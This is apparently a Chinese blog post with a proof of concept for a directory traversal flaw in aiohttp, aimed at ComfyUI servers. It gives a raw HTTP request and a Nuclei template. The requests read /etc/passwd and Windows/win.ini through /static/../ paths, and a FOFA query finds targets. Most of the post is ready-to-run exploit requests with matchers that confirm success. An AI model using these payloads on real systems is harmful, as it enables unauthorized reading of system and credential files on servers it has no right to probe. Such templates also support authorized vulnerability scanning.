Loading... 1.GET /static/../../../../../etc/passwd HTTP/1.1 2.Host: 3.User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 4.Connection: close 5.Accept: */* 6.Accept-Language: en 7.Accept-Encoding: gzip 【Nuclei-Poc验证】 1.id: aiohttp-File-reading 2. 3.info: 4. name: aiohttp 存在目录遍历漏洞 5. author: XLYCr.茶冉 6. severity: high 7. description: aiohttp 存在目录遍历漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 8. reference: 9. metadata: 10. verified: true 11. max-request: 1 12. fofa-query: title=="ComfyUI" 13. tags: File reading 14. 15.requests: 16. - raw: 17. - | 18. GET /static/../../../../../../etc/passwd HTTP/1.1 19. Host: {{Hostname}} 20. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 21. Connection: close 22. Accept: */* 23. Accept-Language: en 24. Accept-Encoding: gzip 25. 26. - | 27. GET /static/../../../../../../Windows/win.ini HTTP/1.1 28. Host: {{Hostname}} 29. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 30. Connection: close 31. Accept: */* 32. Accept-Language: en 33. Accept-Encoding: gzip 34. 35. matchers-condition: or 36. matchers: 37. - type: word 38. words: 39. - "root:x:0:0:" 40. - "[fonts]" 41. part: body 最后修改:2024 年 03 月 09 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 如果觉得我的文章对你有用,请随意赞赏